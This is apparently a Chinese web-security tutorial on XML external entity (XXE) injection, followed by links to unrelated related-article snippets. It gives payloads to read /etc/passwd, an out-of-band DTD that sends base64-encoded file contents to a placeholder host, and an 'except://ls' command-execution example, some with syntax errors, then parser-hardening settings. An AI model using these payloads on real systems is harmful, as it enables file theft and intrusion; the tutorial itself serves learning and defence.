一、什么是XXE

1、XML实体简介

(1)在一段时间中,XML都是WEB信息传输的主要方法,时至今日XML在WEB中作为前后台之间传递数据的结构,依然发挥着重要的作用。在XML中有一种结构叫做实体:

(2)一般其定义的标签关键字ENTITY,分为如下两种:

    一般实体<!ENTITY entity_name "entity_text"> 引用实体&name

    参数实体!ENTITY % entity_name "entity_text"> 引用实体%name

(3)此外还有两个概念内部实体、外部实体,内部实体如上就不赘述了,外部实体如下定义:

    <!ENTITY name SYSTEM "http://hostname.domain.domain/dtd/entities.dtd">

    <!ENTITY copyright SYSTEM "http://hostname.domain.domain/dtd/entities.dtd">

2、搞清楚了1中的内容,接下来我们来看XXE(XML External Entity)

  说白了就是XML外部实体注入,通过构造输入中的XML部分,当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。

二、构造XXE进行利用

1、读取任意文件

(1)有回显的:

直接引用:

 <?xml version = "1.0"?>

 <!DOCTYPE ANY [

     <!ENTITY f SYSTEM "file:///etc/passwd">

 ]>

引入外部定义或声明来引用:

声明的:

 <?xml verstion="1.0" encoding="utf-8"?>

     <!DOCTYPE a[

         <!ENTITY % f SYSTEM "http://www.m03.com/evil.dtd">

         %f;

     ]>

 <c>&b<c>

定义的:

 <?xml verstion="1.0" encoding="utf-8"?>

     <!DOCTYPE a SYSTEM "http://www.m03.com/evil.dtd">

 <c>&b<c>

外部dtd文件如下:

 <!ENTITY b SYSTEM "file:///etc/passwd">

当然外层会有java、php处理

(2)没有回显的,需要发送到远端服务器上:

 <?php

 $xml = <<<EOF

 <?xml version = "1.0"?>

 <!DOCTYPE ANY [

     <!ENTITY %file SYSTEM "php://filter/read=convert.base64-encode/ resource=/etc/issue">

     <!ENTITY %dtd SYSTEM http://a.b.c.d/evil.dtd>

 %dtd

 %send

 ]>

 EOF;

 $data = simplexml_load_STRING($XML)

 #print_r($data)

 ?>

远端服务器上evil.dtd:

 <! ENTITY  % all

     "<! ENTITY % send SYSTEM 'http://a.b.c.d/?%file;'>"

 >

 %all

然后通过远端把这个传过来的文件定义成实体,也就是外部实体,外层在处理。

2、命令执行:

具体参考一个PHP的,当然这里需要php安装插件:

 <?php

 $xml = <<<EOF

 <?xml version = "1.0"?>

 <!DOCTYPE ANY [

     <!ENTITY f SYSTEM "except://ls">

 ]>

 <x>&f;</x>

 EOF;

 $data = simplexml_load_string($xml);

 print_r($data);

 ?>

 /*

 例子参靠源自:

 作者:Pino_HD

 链接:https://www.jianshu.com/p/7325b2ef8fc9

 */

3、SSRF:

  既然发起发起访问,name自然就可以SSRF、同样内网探测也可以。

4、对于不同程序语言

三、防御:

1、对开发语言配置禁用外部实体:

主要是

(1)PHP

 libxml_disable_entity_loader(true);

(2)Java

 DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();

 dbf.setExpandEntityReferences(false);

(3)Python

 from lxml import etree

 xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

2、禁用外部实体

3、及时升级相关组件、中间件、避免组件中有类似的漏洞

四、参考资料:

1、https://www.cnblogs.com/r00tuser/p/7255939.html

2、https://www.jianshu.com/p/7325b2ef8fc9

WEB安全番外第三篇--关于XXE的更多相关文章

  1. WEB安全番外第四篇--关于SQL盲注

    一.SQL盲注: 看不到回显的,无法从返回直接读取到数据库内容的对数据的猜解,属于盲注. 二.第一种--基于布尔类型的盲注: 这种很简单,最典型的例子,就是挖SQL注入的时候常用的: ''' http ...

  2. WEB安全番外第六篇--关于通过记录渗透工具的Payload来总结和学习测试用例

    背景: 在WEB安全的学习过程中,了解过了原理之后,就是学习各种Payload,这里面蕴藏着丰富的知识含量,是在基本上覆盖了漏洞原理之后的进一步深入学习的必经之路.无理是Burpsuite还是Sqlm ...

  3. WEB安全番外第五篇--关于使用通配符进行OS命令注入绕WAF

    一.通配符简介: 一般来讲,通配符包含*和?,都是英文符号,*用来匹配任意个任意字符,?用来匹配一个任意字符. 举个例子使用通配符查看文件,可以很名下看到打卡的文件是/etc/resolv.conf: ...

  4. Python之路番外(第三篇):Pycharm的使用秘籍

    版本:Pycharm2017.3.4Professional Edition 一.Pycharm的基本使用1.在Pycharm下为你的python项目配置python解释器 file --settin ...

  5. WEB安全番外第二篇--明日之星介绍HTML5安全问题介绍

    一.CORS领域问题: 1.CORS的介绍请参考:跨域资源共享简介 2.HTML5中的XHR2级调用可以打开一个socket连接,发送HTTP请求,有趣的是,上传文件这里恰恰是multi-part/f ...

  6. WEB安全番外第一篇--其他所谓的“非主流”漏洞:URL跳转漏洞与参数污染

    一.URL跳转篇: 1.原理:先来看这段代码: <?php if(isset($_GET["url_redircetion_target"])){ $url_redirect ...

  7. Python 项目实践三(Web应用程序)第三篇

    接着上节的继续学习,现在要显示所有主题的页面 有了高效的网页创建方法,就能专注于另外两个网页了:显示全部主题的网页以及显示特定主题中条目的网页.所有主题页面显示用户创建的所有主题,它是第一个需要使用数 ...

  8. Python 项目实践三(Web应用程序) 第三篇

    接着上节的继续学习,现在要显示所有主题的页面 有了高效的网页创建方法,就能专注于另外两个网页了:显示全部主题的网页以及显示特定主题中条目的网页.所有主题页面显示用户创建的所有主题,它是第一个需要使用数 ...

  9. .net core番外第2篇:Autofac的3种依赖注入方式(构造函数注入、属性注入和方法注入),以及在过滤器里面实现依赖注入

    本篇文章接前一篇,建议可以先看前篇文章,再看本文,会有更好的效果. 前一篇跳转链接:https://www.cnblogs.com/weskynet/p/15046999.html 正文: Autof ...

随机推荐

  1. 解决C# WINFORM程序只允许运行一个实例的几种方法详解

    要实现程序的互斥,通常有下面几种方式,下面用 C# 语言来实现: 方法一: 使用线程互斥变量. 通过定义互斥变量来判断是否已运行实例. 把program.cs文件里的Main()函数改为如下代码: u ...

  2. centos-7 charpter one

    一.system locale 的介绍: 系统的区域设置被保存在/etc/locale.conf 这个文件中,systemd在启动的时候会去读取它:所有用户和程序的区域设置都继承自它, 当然用户&am ...

  3. Python操作列表常用方法

    Python操作列表的常用方法. 列表常用的方法操作列表以及小例子: 1. Append 在列表末尾添加元素,需在列表末尾添加元素,需要注意几个点: A. append中添加的参数是作为一个整体 &g ...

  4. SMBus总线概述

    1.概述: 系统管理总线是一种两线制接口.它基于I2C 总线原理演变而来,可以认为是简化版的I2C总线. SMBus最初是应用到智能电池,如电池充电器和一个微控制器.其提供一个系统和电源管理相关的任务 ...

  5. 如何使用VIM的列编辑模式 [转]

    如何使用VIM的列编辑模式? * windows 我使用的VIM FOR WINDOWS,一直都听说VIM有列编辑模式,一直没有使用过,试了几次都失败了.今天又因为工作需要,到网上查了一下,经过不断的 ...

  6. 【Android】13.1 用Android自带的API访问SQLite数据库

    分类:C#.Android.VS2015: 创建日期:2016-02-26 一.简介 这一节我们先来看看如何直接用Android自带的API创建和访问SQLite数据库. 1.创建SQLite数据库 ...

  7. ENGINE_API CXNoTouch

    /************************************************************************/ //屏蔽消息面板 //优先级默认为 TP_BOTT ...

  8. 0059 Spring MVC与浏览器间的JSON数据转换--@RequestBody--@ResponseBody--MappingJacson2HttpMessageConverter

    浏览器与服务器之间的数据交换有很多类型,不只是表单提交数据这一种,比如ajax技术就大量使用json.xml等,这时候就涉及到浏览器端和服务器端数据格式转换的问题,服务器端都是Java对象,需要把请求 ...

  9. GDB和WinDbg中调用函数

    GDB: 特别简单,直接写调用式子即可,如下图的p word.c_str(),其中word的类型是std::string WinDbg:目前都说是.call命令,说实话我宁愿不用...见: http: ...

  10. ReentrantReadWriteLock读写锁的使用<转>

    Lock比传统线程模型中的synchronized方式更加面向对象,与生活中的锁类似,锁本身也应该是一个对象.两个线程执行的代码片段要实现同步互斥的效果,它们必须用同一个Lock对象. 读写锁:分为读 ...